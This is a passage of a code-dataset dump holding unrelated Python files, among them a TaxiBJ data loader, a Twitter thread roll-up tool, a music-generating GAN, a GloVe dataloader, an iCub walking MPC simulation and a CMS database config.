timestamps=timestamps_all_vstack,\n meta_data=meta_feature)\n s = shuffle_data_many([X, Y, timestamps_X, meta_feature_X])\n X, Y, timestamps_X, meta_feature = s[0], s[1], s[2], s[3]\n X_train, X_test = X[:-len_test], X[-len_test:]\n Y_train, Y_test = Y[:-len_test], Y[-len_test:]\n\n if metadata_dim is not None:\n meta_feature_train, meta_feature_test = meta_feature[\n :-len_test], meta_feature[-len_test:]\n\n X_train.append(meta_feature_train)\n X_test.append(meta_feature_test)\n\n\n\n return X_train, Y_train, X_test, Y_test, mmn, metadata_dim, timestamp_train, timestamp_test\n\n\ndef generate_new_sample(x, T=6):\n nb_sample = len(x)\n x_new = []\n for i in range(T):\n tmp = []\n for j in range(nb_sample):\n tmp.append(x[j][i])\n x_new.append(tmp)\n return x_new\n\n\ndef shuffle_data_many(a):\n permutation = list(np.random.permutation(len(a[0])))\n a_shuffle = []\n for x in a:\n x_new = [x[i] for i in permutation]\n a_shuffle.append(x_new)\n return a_shuffle\n\n\n(T, nb_flow, len_test) = (48, 2, 1344)\nif __name__ == '__main__':\n X_train, Y_train, X_test, Y_test, mmn, external_dim, timestamp_train, timestamp_test = load_data(\n T=T, nb_flow=nb_flow, len_test=len_test, preprocess_name='preprocessing.pkl',\n meta_data=True, meteorol_data=True, holiday_data=True)\n\n print('love world')\n","sub_path":"expTaxiBJ/TaxiBJ_beifen.py","file_name":"TaxiBJ_beifen.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"97711289","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\nUsage: rollup_thread.py --credentials= --url=\n rollup_thread.py -h --help\n\nOptions:\n --credentials=\n Path to an HCL or JSON file containing Twitter API credentials.\n The file should be a dict with four keys:\n * consumer_key\n * consumer_secret\n * access_token\n * access_token_secret\n\n --url=\n URL of the final tweet in the thread.\n\n\"\"\"\n\nimport docopt\n\nfrom backup_twitter import setup_api, TwitterCredentials\n\n\nif __name__ == '__main__':\n docopt_args = docopt.docopt(__doc__)\n\n credentials = TwitterCredentials.from_path(docopt_args['--credentials'])\n api = setup_api(credentials=credentials)\n\n status_id = docopt_args['--url'].split('/')[-1]\n\n thread = []\n\n while True:\n resp = api.statuses_lookup([status_id])\n assert len(resp) == 1\n tweet = resp[0]\n\n thread.insert(0, tweet)\n\n status_id = tweet.in_reply_to_status_id_str\n if status_id is None:\n break\n\n print(f'https://twitter.com/{tweet.user.screen_name}/status/{tweet.id_str}')\n print('---\\n')\n print('\\n\\n'.join(t.full_text for t in thread))\n","sub_path":"backup_twitter/rollup_thread.py","file_name":"rollup_thread.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"530100726","text":"from selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium.webdriver.common.by import By\nfrom .base_page import BasePage\n\n\nclass ProductsListPage(BasePage):\n popup = (By.XPATH, '//div[@class=\"vue-portal-target\"]//div[@role=\"presentation\"]')\n popup_close = (By.XPATH, \"//button[contains(@class, 'closeModal')]\")\n product_item = (By.CSS_SELECTOR, \"a[data-test='productPreviewInfo']\")\n\n def close_popup(self):\n self.wait.until(EC.visibility_of_element_located(self.popup_close)).click()\n self.wait.until(EC.invisibility_of_element_located(self.popup))\n assert self.is_not_element_present(*self.popup)\n\n def check_if_popup_is_present(self):\n self.wait.until(EC.visibility_of_element_located(self.popup))\n assert self.is_element_present(*self.popup)\n\n def open_product_card(self):\n self.wait.until(EC.visibility_of_element_located(self.product_item))\n random_section = self.get_random_item(self.product_item)\n random_section.click()\n","sub_path":"ennergia/Pages/products_list_page.py","file_name":"products_list_page.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"146021017","text":"\nimport sys\n\nimport random\n\nimport rclpy\nfrom rclpy.node import Node\n\nfrom sample.msg import A,B,C\n\nclass Talker(Node):\n\n def __init__(self):\n super().__init__('talker')\n self.i = 0\n self.a_pub = self.create_publisher(A,'/a')\n self.b_pub = self.create_publisher(B, '/b')\n self.c_pub = self.create_publisher(C, '/c')\n\n timer_period = 1.0\n\n self.timer = self.create_timer(timer_period, self.timer_callback)\n\n self.a_sub = self.create_subscription(A, '/a', self.sub_a_callback)\n self.b_sub = self.create_subscription(B, '/b', self.sub_b_callback)\n\n def gen_a(self):\n a = A()\n a.x = 0.0\n a.y = random.randint(0, 1000) * 1.1\n a.int_arr = []\n for i in range(random.randint(3, 10)):\n a.int_arr.append(random.randint(0, 1000))\n\n return a\n\n def timer_callback(self):\n a = self.gen_a()\n self.i += 1\n a.x = self.i*1.0\n self.a_pub.publish(a)\n\n print(self.i)\n\n def sub_a_callback(self, msg):\n print('A msg xysum:',msg.xysum())\n b = B()\n b.BASE = msg\n b.another_a = self.gen_a()\n b.z = random.randint(0,100)*1.1\n\n self.b_pub.publish(b)\n\n def sub_b_callback(self, msg):\n print('B msg zbig:', msg.zbig())\n c = C()\n c.BASE = msg\n c.y = random.randint(0,10)*1.1\n\n print('C msg xysum:',c.xysum())\n print('C msg get_vnum:',c.get_vnum())\n\n self.c_pub.publish(c)\n\ndef main(args=None):\n if args is None:\n args = sys.argv\n\n rclpy.init(args=args)\n\n node = Talker()\n\n rclpy.spin(node)\n\n node.destroy_node()\n\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","sub_path":"sample/ros_genmsg/talker_a_b_c.py","file_name":"talker_a_b_c.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"479427252","text":"import sys\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport glob\nfrom keras.layers import LSTM\nfrom music21 import converter, instrument, note, chord, stream\nfrom keras.layers import Input, Dense, Reshape, Dropout, CuDNNLSTM, Bidirectional\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D\nfrom keras.utils import np_utils\nimport numpy as np\nfrom keras.layers import Input\nfrom keras.models import Model, Sequential\nfrom keras.layers.core import Dense, Dropout\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.optimizers import Adam\n\n\ndef get_notes():\n ####################################نت ها از فایل midi خوانده می شوند #################################\n notes = []\n\n for file in glob.glob(\"Pokemon MIDIs/*.mid\"):\n midi = converter.parse(file)\n\n print(\"Parsing %s\" % file)\n\n notes_to_parse = None\n\n try: # file has instrument parts\n s2 = instrument.partitionByInstrument(midi)\n notes_to_parse = s2.parts[0].recurse()\n except: # file has notes in a flat structure\n notes_to_parse = midi.flat.notes\n\n for element in notes_to_parse:\n if isinstance(element, note.Note):\n notes.append(str(element.pitch))\n elif isinstance(element, chord.Chord):\n notes.append('.'.join(str(n) for n in element.normalOrder))\n\n return notes\n\n\ndef prepare_sequences(notes, n_vocab):\n ####################################ساخت دنباله برای ورودی و خروجی مدل #################################\n sequence_length = 100\n\n # Get all pitch names\n pitchnames = sorted(set(item for item in notes))\n\n ####################################دیکشنری برای map کردن گام نت به int #################################\n note_to_int = dict((note, number) for number, note in enumerate(pitchnames))\n\n network_input = []\n network_output = []\n\n ####################################تولید دنباله ورودی .به ازای هر دنباله ورودی یک نت خروجی داریم که در یک آرایه ذخیره میکنیم #################################\n for i in range(0, len(notes) - sequence_length, 1):\n sequence_in = notes[i:i + sequence_length]\n sequence_out = notes[i + sequence_length]\n network_input.append([note_to_int[char] for char in sequence_in])\n network_output.append(note_to_int[sequence_out])\n\n n_patterns = len(network_input)\n\n\n ####################################تغییر ورودی به فرمتی که برای lstm قابل قبول باشد #################################\n network_input = np.reshape(network_input, (n_patterns, sequence_length, 1))\n\n ####################################نرمال کردن ورودی بین -1 و1 #################################\n network_input = (network_input - float(n_vocab) / 2) / (float(n_vocab) / 2)\n network_output = np_utils.to_categorical(network_output)\n\n return (network_input, network_output)\n\n\n\n\ndef create_midi(prediction_output, filename):\n ####################################تبدیل دنباله خروجی به نت وسپس تولید فایل موسیقی#################################\n offset = 0\n output_notes = []\n\n\n for item in prediction_output:\n pattern = item[0]\n ####################################در اینجا کتابخانه note21 تشخیص میدهد که آکورد هست یا نت معمولی#################################\n\n if ('.' in pattern) or pattern.isdigit():\n notes_in_chord = pattern.split('.')\n notes = []\n for current_note in notes_in_chord:\n new_note = note.Note(int(current_note))\n new_note.storedInstrument = instrument.Piano()\n notes.append(new_note)\n new_chord = chord.Chord(notes)\n new_chord.offset = offset\n output_notes.append(new_chord)\n\n else:\n new_note = note.Note(pattern)\n new_note.offset = offset\n new_note.storedInstrument = instrument.Piano()\n output_notes.append(new_note)\n\n # increase offset each iteration so that notes do not stack\n offset += 0.5\n\n midi_stream = stream.Stream(output_notes)\n midi_stream.write('midi', fp='output8.mid')\n\n\n\nrandomDim = 1000\n\n####################################خواندن داده(نت)#################################\nnotes = get_notes()\nn_vocab = len(set(notes))\nX_train, y_train = prepare_sequences(notes, n_vocab)\n\nseq_length = 100\nseq_shape = (seq_length, 1)\n# Optimizer\nadam = Adam(lr=0.0002, beta_1=0.5)\n\ndisc_loss = []\ngen_loss = []\n\n####################################شبکه اول Generator است که یک آرایه به صورت رندم به عنوان ورودی میگیرد این شبکه سعی می کند دنباله ای از نت را مشابه آنچه در مجموعه آموزش است به خروجی بدهد#################################\ngenerator = Sequential()\ngenerator.add(Dense(256, input_dim=randomDim))\ngenerator.add(LeakyReLU(0.2))\ngenerator.add(BatchNormalization(momentum=0.8))\ngenerator.add(Dense(512))\ngenerator.add(LeakyReLU(alpha=0.2))\ngenerator.add(BatchNormalization(momentum=0.8))\ngenerator.add(Dense(1024))\ngenerator.add(LeakyReLU(alpha=0.2))\ngenerator.add(BatchNormalization(momentum=0.8))\ngenerator.add(Dense(np.prod(seq_shape), activation='tanh'))\ngenerator.add(Reshape(seq_shape))\ngenerator.compile(loss='binary_crossentropy', optimizer=adam)\n\n####################################شبکه دوم Discriminator است که یک شبکه binary classification است که آموزش داده شده تا دنباله تولید شده توسط generator را ارزیابی کند. این شبکه دیتا واقعی را از مجموعه آموزش میگیرد همچنین ورودی دیگری از شبکه generator میگیرد و وظیفه آن تشخیص دنباله نت واقعی از غیر واقعی(نویز) است#################################\n\ndiscriminator = Sequential()\ndiscriminator.add(LSTM(512, input_shape=seq_shape, return_sequences=True))\ndiscriminator.add(Bidirectional(LSTM(512)))\ndiscriminator.add(Dense(512))\ndiscriminator.add(LeakyReLU(alpha=0.2))\ndiscriminator.add(Dense(256))\ndiscriminator.add(LeakyReLU(alpha=0.2))\ndiscriminator.add(Dense(1, activation='sigmoid'))\ndiscriminator.compile(loss='binary_crossentropy', optimizer=adam)\n\n####################################هاین شبکه دیتا واقعی را از مجموعه آموزش میگیرد و مچنین ورودی دیگری از شبکه generator میگیرد و وظیفه آن تشخیص دنباله نت واقعی از غیر واقعی(نویز) است#################################\n\ndiscriminator.trainable = False\nganInput = Input(shape=(randomDim,))\nx = generator(ganInput)\nganOutput = discriminator(x)\ngan = Model(inputs=ganInput, outputs=ganOutput)\ngan.compile(loss='binary_crossentropy', optimizer=adam)\n\ndLosses = []\ngLosses = []\n\n\ndef generate( input_notes):\n\n notes = input_notes\n pitchnames = sorted(set(item for item in notes))\n int_to_note = dict((number, note) for number, note in enumerate(pitchnames))\n\n #################################### به صورت رندم نویز تولید کرده و به عنوان ورودی به generatorld می دهیم#################################\n\n noise = np.random.normal(0, 1, (1, 1000))\n predictions = generator.predict(noise)\n\n pred_notes = [x * 242 + 242 for x in predictions[0]]\n\n pred_notes = [int_to_note[int(x)] for x in pred_notes]\n\n create_midi(pred_notes, 'gan_final')\n\ndef train(epochs, batchSize):\n\n\n notes = get_notes()\n n_vocab = len(set(notes))\n X_train, y_train = prepare_sequences(notes, n_vocab)\n batchCount = X_train.shape[0] / batchSize\n print\n 'Epochs:', epochs\n print\n 'Batch size:', batchSize\n print\n 'Batches per epoch:', batchCount\n real = np.ones((batchSize, 1))\n fake = np.zeros((batchSize, 1))\n for epoch in range(epochs):\n\n idx = np.random.randint(0, X_train.shape[0], batchSize)\n real_seqs = X_train[idx]\n noise = np.random.normal(0, 1, (batchSize, randomDim))\n # Generate fake sequence\n gen_seqs = generator.predict(noise)\n\n\n\n # Train discriminator\n discriminator.trainable = True\n d_loss_real = discriminator.train_on_batch(real_seqs, real)\n d_loss_fake = discriminator.train_on_batch(gen_seqs, fake)\n #discriminator loss\n d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)\n\n # Train generator\n noise = np.random.normal(0, 1, size=[batchSize, randomDim])\n discriminator.trainable = False\n #generator loss\n g_loss = gan.train_on_batch(noise, real)\n #check again Hamide\n\n print(\"%d [D loss: %f] [G loss: %f]\" % (epoch, d_loss, g_loss))\n disc_loss.append(d_loss)\n gen_loss.append(g_loss)\n generate(notes)\n\n\n\nif __name__ == '__main__':\n train(10, 32)","sub_path":"ModelLstmGAN2.py","file_name":"ModelLstmGAN2.py","file_ext":"py","file_size_in_byte":9238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"618308491","text":"import re\nfrom sklearn.model_selection import train_test_split\nimport os\nimport time\nfrom tensorflow.contrib import learn\nfrom collections import Counter\nimport numpy as np\nimport copy\nimport math\nimport json\n\n\nclass Dataloader():\n def __init__(self, batch_size, Glove_embedding):\n self.batch_size = batch_size\n\n self.load_GloVe (Glove_embedding)\n\n #self.embedding = np.asarray(embedding)\n\n def load_GloVe(self, file_path):\n \"\"\"\n Load word embeddings in the format of GloVe.\n \n \"\"\"\n vocab = dict()\n embd = []\n with open(file_path,'r',encoding=\"utf8\") as file:\n for line in file.readlines():\n row = line.strip().split(' ')\n vocab[row[0]] = len(vocab)\n embd.append(row[1:])\n embedding = np.asarray(embd, dtype=np.float32)\n print('Loaded GloVe success') \n self.vocab = vocab\n self.embedding = embedding\n\n def tokenizer(self, iterator):\n for value in iterator:\n #print (value)\n yield re.split(r'\\s', value)\n\n\n\n def Processor(self, MAX_vo, tokenizer):\n processor = learn.preprocessing.VocabularyProcessor(MAX_vo, tokenizer_fn=tokenizer)\n return processor\n\n\n\n def Training_data_load(self, file_path, Glove_embedding):\n # Load Train data\n\n ID = []\n label = []\n sentence = []\n \n #assert (0)\n with open(file_path, encoding='utf-8') as f:\n line = f.readline()\n files = json.loads(line)\n for instance in files:\n ID.append(instance[\"ID\"])\n sentence1 = instance[\"Sentence\"]\n sentence.append(sentence1)\n label.append (instance[\"Label\"])\n \n MAX_vo = 50#\n\n vocab,embedding = self.load_GloVe (Glove_embedding)\n\n embedding = np.asarray(embedding)\n\n #prevent change\n processor = self.Processor(MAX_vo, self.tokenizer)\n processor.fit(vocab)\n sentence = np.array(list(processor.fit_transform(sentence)))\n #assert (0)\n\n\n # Shuffle the data\n \n shuffle_indices = np.random.permutation(np.arange(len(ID)))\n sentence = np.array(sentence)[shuffle_indices]\n label = np.array(label)[shuffle_indices]\n ID = np.array(ID)[shuffle_indices]\n\n\n # Split batches\n #print (len(self.label))\n self.batchNumber = int(len(ID) / self.batch_size) \n sentence_s = sentence[:self.batchNumber * self.batch_size]\n label_s = label[:self.batchNumber * self.batch_size]\n ID_s = ID[:self.batchNumber * self.batch_size]\n\n self.sentence_batches = np.split(sentence_s, self.batchNumber, 0)\n self.label_batches = np.split(label_s, self.batchNumber, 0)\n self.ID_batches = np.split (np.array(ID_s), self.batchNumber, 0)\n\n self.sentence_batches.append(sentence[self.batchNumber * self.batch_size : ])\n self.label_batches.append( label[self.batchNumber * self.batch_size : ])\n self.ID_batches.append (ID[self.batchNumber * self.batch_size : ])\n\n\n #print (\"The number of labels are : \",np.max(label))\n\n if len(ID) % self.batch_size != 0:\n self.batchNumber = int(len(ID) / self.batch_size) + 1\n #assert (0)\n self.pointer = 0\n return embedding\n\n \n def Test_data_load(self, file_path, Glove_embedding):\n # Load Test data\n\n ID = []\n sentence = []\n \n #assert (0)\n with open(file_path, encoding='utf-8') as f:\n line = f.readline()\n files = json.loads(line)\n for instance in files:\n ID.append(instance[\"ID\"])\n sentence1 = instance[\"Sentence\"]\n sentence.append(sentence1)\n \n MAX_vo = 50#\n\n vocab,embedding = self.load_GloVe (Glove_embedding)\n\n embedding = np.asarray(embedding)\n\n #prevent change\n processor = self.Processor(MAX_vo, self.tokenizer)\n processor.fit(vocab)\n sentence = np.array(list(processor.fit_transform(sentence)))\n \n\n # Split batches\n #print (len(self.label))\n self.batchNumber = int(len(ID) / self.batch_size) \n sentence_s = sentence[:self.batchNumber * self.batch_size]\n ID_s = ID[:self.batchNumber * self.batch_size]\n\n self.sentence_batches = np.split(sentence_s, self.batchNumber, 0)\n self.ID_batches = np.split (np.array(ID_s), self.batchNumber, 0)\n\n self.sentence_batches.append(sentence[self.batchNumber * self.batch_size : ])\n self.ID_batches.append (ID [self.batchNumber * self.batch_size : ])\n\n if len(ID) % self.batch_size != 0:\n self.batchNumber = int(len(ID) / self.batch_size) + 1\n #assert (0)\n self.pointer = 0\n return embedding\n\n\n\n def set_folder(self, folder):\n self.folder = folder\n\n def reset_pointer(self):\n self.pointer = 0\n\n\n def Train_next_batch(self):\n self.pointer = (self.pointer + 1) % self.batchNumber\n ret = self.sentence_batches[self.pointer], self.label_batches[self.pointer], self.ID_batches[self.pointer]\n return ret\n\n def Test_next_batch(self):\n self.pointer = (self.pointer + 1) % self.batchNumber\n ret = self.sentence_batches[self.pointer], self.ID_batches[self.pointer]\n return ret\n\n\n\n\n\n\ndata_loader_train = Dataloader(32, True)\ndata_loader_train.Training_data_load(\"question_2_data/train.json\", \"word_embedding/glove.6B.50d.txt\")\n\n","sub_path":"big-data-project-data-set/baozi-data/assignment_3/assignment_3/Q2/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"269039515","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 18 09:10:14 2020\n\n@author: suyaqi\n\"\"\"\n#import matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\n#Input a DNA sequence\nseq=input('Please enter a DNA sequence:')\n#Count the number of AGCT in the input sequence\nA=seq.count('A')\nC=seq.count('C')\nG=seq.count('G')\nT=seq.count('T')\n#Make the frequency dictionary\ngene_dict={'A':A,'G':G,'C':C,'T':T}\nprint('The frequency dictionary of the input sequence is:',gene_dict)\n\n#Set labels and sizes based on the dictionary\nlabels = 'A','G','C','T'\nsizes = (A,G,C,T)\n#Set the colors of the pieplot\ncolors = 'lightgreen','lightskyblue','lightpink','grey'\n#Set all gaps to be 0\nexplode = (0,0,0,0)\n#Make the pieplot\nplt.pie(sizes, explode=explode,labels=labels,colors=colors,autopct='%1.1f%%',shadow=False, startangle=50)\n#Set the shape of the pieplot as circle\nplt.axis('equal')\nplt.show()","sub_path":"Practical 6/Counting DNA nucleotides.py","file_name":"Counting DNA nucleotides.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"240625302","text":"import tkinter as tk\nimport tkinter.filedialog as filedialog\nimport actor.zipper as zipper\nimport traceback\nfrom errorclass.zipyerror import ZipyError\n\n\nclass MainDisplay():\n def __init__(self):\n root = tk.Tk()\n root.geometry('420x240')\n self.dir_path = \"\"\n self.master = root\n self.create_widgets()\n \n def run(self):\n self.master.mainloop()\n\n def create_widgets(self):\n btn_select_dir = tk.Button(text=\"フォルダ選択\", command=self.select_dir)\n btn_select_dir.pack(side=\"top\", pady=10)\n\n lbl_disp1 = tk.Label(text=\"■フォルダパス:\")\n lbl_disp1.pack(side=\"top\")\n\n lbl_path = tk.Label(text=\"\")\n lbl_path.pack(side=\"top\")\n self.lbl_path = lbl_path\n\n lbl_disp2 = tk.Label(text=\"■パスワード:\")\n lbl_disp2.pack(side=\"top\")\n\n entry_pwd = tk.Entry(width=30)\n entry_pwd.pack(side=\"top\")\n self.entry_pwd = entry_pwd\n\n btn_select_dir = tk.Button(text=\"圧縮\", command=self.compress)\n btn_select_dir.pack(side=\"top\", pady=10)\n\n def select_dir(self):\n dir_path = filedialog.askdirectory()\n self.lbl_path[\"text\"] = dir_path\n self.dir_path = dir_path\n\n def compress(self):\n try:\n zipper.create_zip_file(self.dir_path, self.entry_pwd.get(), 1)\n except ZipyError:\n traceback.print_exc()\n\n\n","sub_path":"display/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"391460911","text":"import robotoc\nfrom robotoc_sim import MPCSimulation, CameraSettings\nfrom icub_simulator import iCubSimulator\nimport numpy as np\n\n\nmodel_info = robotoc.RobotModelInfo()\nmodel_info.urdf_path = '../icub_description/urdf/icub_lower_half.urdf'\nmodel_info.base_joint_type = robotoc.BaseJointType.FloatingBase\nbaumgarte_time_step = 0.05\nmodel_info.surface_contacts = [robotoc.ContactModelInfo('l_sole', baumgarte_time_step),\n robotoc.ContactModelInfo('r_sole', baumgarte_time_step)]\nrobot = robotoc.Robot(model_info)\n\nknee_angle = np.pi / 6\nstep_length = np.array([0.22, 0, 0]) \nstep_yaw = np.pi / 60\n\nstep_height = 0.1\nswing_time = 0.7\ndouble_support_time = 0.0\n# double_support_time = 0.05\nswing_start_time = 0.5\n\nvcom_cmd = 0.5 * step_length / (swing_time+double_support_time)\nyaw_rate_cmd = step_yaw / swing_time\n\nT = 0.7\nN = 25\nmpc = robotoc.MPCBipedWalk(robot, T, N)\n\nplanner = robotoc.BipedWalkFootStepPlanner(robot)\nplanner.set_gait_pattern(step_length, step_yaw, (double_support_time > 0.))\n# planner.set_raibert_gait_pattern(vcom_cmd, yaw_rate_cmd, swing_time, double_support_time, gain=0.7)\nmpc.set_gait_pattern(planner, step_height, swing_time, double_support_time, swing_start_time)\n\n# wrench cone\nX = 0.05\nY = 0.025\nmpc.get_contact_wrench_cone_handle().set_rectangular(X=X, Y=Y)\nmpc.get_impact_wrench_cone_handle().set_rectangular(X=X, Y=Y)\n\nt0 = 0.0\nq0 = np.array([0, 0, 0, 0, 0, 0, 1,\n 0.5*knee_angle, 0, 0, -knee_angle, 0.5*knee_angle, 0, # left leg\n 0.5*knee_angle, 0, 0, -knee_angle, 0.5*knee_angle, 0]) # right leg\nrobot.forward_kinematics(q0)\nq0[2] = - 0.5 * (robot.frame_position('l_sole')[2] + robot.frame_position('r_sole')[2]) \nv0 = np.zeros(robot.dimv())\noption_init = robotoc.SolverOptions()\noption_init.max_iter = 200\noption_init.nthreads = 4\nmpc.init(t0, q0, v0, option_init)\n\noption_mpc = robotoc.SolverOptions()\noption_mpc.max_iter = 1 # MPC iterations\noption_mpc.nthreads = 4\nmpc.set_solver_options(option_mpc)\n\ntime_step = 0.0025 # 400 Hz MPC\nicub_simulator = iCubSimulator(urdf_path=model_info.urdf_path, time_step=time_step)\ncamera_settings = CameraSettings(camera_distance=2.0, camera_yaw=45, camera_pitch=-10.0, \n camera_target_pos=q0[0:3]+np.array([0.7, 1.2, 0.0]))\nicub_simulator.set_camera_settings(camera_settings=camera_settings)\n\nsimulation_time = 20.0\nlog = False\nrecord = False\nsimulation = MPCSimulation(simulator=icub_simulator)\nsimulation.run(mpc=mpc, t0=t0, q0=q0, simulation_time=simulation_time, \n feedback_delay=True, verbose=False, \n record=record, log=log, name='icub_walk')\n\nif record:\n robotoc.utils.adjust_video_duration(simulation.name+'.mp4', \n desired_duration_sec=simulation_time)\n\nif log:\n q_log = np.genfromtxt(simulation.q_log)\n v_log = np.genfromtxt(simulation.v_log)\n t_log = np.genfromtxt(simulation.t_log)\n sim_steps = t_log.shape[0]\n\n vcom_log = []\n wcom_log = []\n vcom_cmd_log = []\n yaw_rate_cmd_log = []\n for i in range(sim_steps):\n R = robotoc.utils.rotation_matrix_from_quaternion(q_log[i][3:7])\n robot.forward_kinematics(q_log[i], v_log[i])\n vcom_log.append(R.T@robot.com_velocity()) # robot.com_velocity() is expressed in the world coordinate\n wcom_log.append(v_log[i][3:6])\n vcom_cmd_log.append(vcom_cmd)\n yaw_rate_cmd_log.append(yaw_rate_cmd)\n\n plot_mpc = robotoc.utils.PlotCoMVelocity()\n plot_mpc.plot(t_log, vcom_log, wcom_log, vcom_cmd_log, yaw_rate_cmd_log, \n fig_name=simulation.name+'_com_vel')\n","sub_path":"examples/icub/mpc/walk.py","file_name":"walk.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123275995","text":"import sys\n\ndef parse(tokens):\n\treturn list(map(int, tokens[1:-1].split(',')))\n\nfor line in open(sys.argv[1]):\n\tstreets, avenues = list(map(parse, line.rstrip().split(' ')))\n\toffset, count = avenues[-1] / streets[-1], 0\n\tfor x0, x1 in zip(streets[:-1], streets[1:]):\n\t\tp0, p1 = x0 * offset, x1 * offset\n\t\tfor y0, y1 in zip(avenues[:-1], avenues[1:]):\n\t\t\tcount += 1 if not (p1 <= y0 or p0 >= y1) else 0\n\tprint(count)","sub_path":"moderate/python/43_city_blocks_flyover.py3","file_name":"43_city_blocks_flyover.py3","file_ext":"py3","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"119469311","text":"import cv2\nimport math\nimport numpy as np\n\n# Read the original image\nimg = cv2.imread('assets/Regent street.JPG')\n\n# Gets the image rows and columns\nrows, cols = img.shape[:2]\n\n# New target image\ndst = np.zeros((rows, cols, 3), dtype=\"uint8\")\n\n# define wave parameters\nwavelength = 20\namplitude = 30\nphase = math.pi / 4\n\n# get the center point\ncentreX = 0.5\ncentreY = 0.5\nradius = min(rows, cols) / 2\n\n# set wave cover area\nicentreX = cols * centreX\nicentreY = rows * centreY\n\n# wave effects\nfor i in range(rows):\n for j in range(cols):\n dx = j - icentreX\n dy = i - icentreY\n distance = dx * dx + dy * dy\n\n if distance > radius * radius:\n x = j\n y = i\n else:\n # calculate wave area\n distance = math.sqrt(distance)\n amount = amplitude * math.sin(distance / wavelength * 2 * math.pi - phase)\n amount = amount * (radius - distance) / radius\n amount = amount * wavelength / (distance + 0.0001)\n x = j + dx * amount\n y = i + dy * amount\n\n # border judgement\n if x < 0:\n x = 0\n if x >= cols - 1:\n x = cols - 2\n if y < 0:\n y = 0\n if y >= rows - 1:\n y = rows - 2\n\n p = x - int(x)\n q = y - int(y)\n\n # wave assignment\n dst[i, j, :] = (1 - p) * (1 - q) * img[int(y), int(x), :] + p * (1 - q) * img[int(y), int(x), :]\n + (1 - p) * q * img[int(y), int(x), :] + p * q * img[int(y), int(x), :]\n\n# show image\ncv2.imshow('src', img)\ncv2.imshow('dst', dst)\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"image_Light ripple/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"169924467","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"TEST\")\nprocess.source = cms.Source(\"EmptyIOVSource\",\n lastValue = cms.uint64(100),\n timetype = cms.string('Lumi'),\n firstValue = cms.uint64(11),\n interval = cms.uint64(11)\n)\n\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n cerr = cms.untracked.PSet(\n enable = cms.untracked.bool(False)\n ),\n cout = cms.untracked.PSet(\n enable = cms.untracked.bool(True),\n threshold = cms.untracked.string('DEBUG')\n )\n)\n\nprocess.OnlineDBOutputService = cms.Service(\"OnlineDBOutputService\",\n DBParameters = cms.PSet(\n messageLevel = cms.untracked.int32(2),\n authenticationPath = cms.untracked.string('.')\n ),\n jobName = cms.untracked.string(\"TestLumiBasedUpdate\"),\n autoCommit = cms.untracked.bool(True),\n connect = cms.string('sqlite_file:test_lumi.db'),\n preLoadConnectionString = cms.untracked.string('sqlite_file:test_lumi.db'),\n #omsServiceUrl = cms.untracked.string('http://cmsoms-services.cms:9949/urn:xdaq-application:lid=100/getRunAndLumiSection'),\n #lastLumiFile = cms.untracked.string('lastLumi.txt'),\n toPut = cms.VPSet(cms.PSet(\n record = cms.string('PedestalsRcd'),\n tag = cms.string('mytest'),\n timetype = cms.untracked.string('Lumi'),\n onlyAppendUpdatePolicy = cms.untracked.bool(True)\n ))\n)\n\nprocess.mytest = cms.EDAnalyzer(\"LumiBasedUpdateAnalyzer\",\n record = cms.string('PedestalsRcd'),\n lastLumiFile = cms.untracked.string('lastLumi.txt')\n #omsServiceUrl = cms.untracked.string('http://cmsoms-services.cms:9949/urn:xdaq-application:lid=100/getRunAndLumiSection')\n)\n\nprocess.p = cms.Path(process.mytest)\n\n\n\n","sub_path":"CondCore/DBOutputService/test/python/testLumiBasedUpdateAnalyzer_cfg.py","file_name":"testLumiBasedUpdateAnalyzer_cfg.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"381845535","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 29 09:07:02 2017\r\n\r\nSigo probando combinación de variables.\r\nCorré bien con Kernel='rbf', con el resto no corre (sigmoid termina sin valor)\r\n\r\nProbé agregando un MA a 50 días, pero empeora cuando se combina con MA210\r\n\r\n@author: bruno\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import preprocessing, model_selection, svm\r\nimport 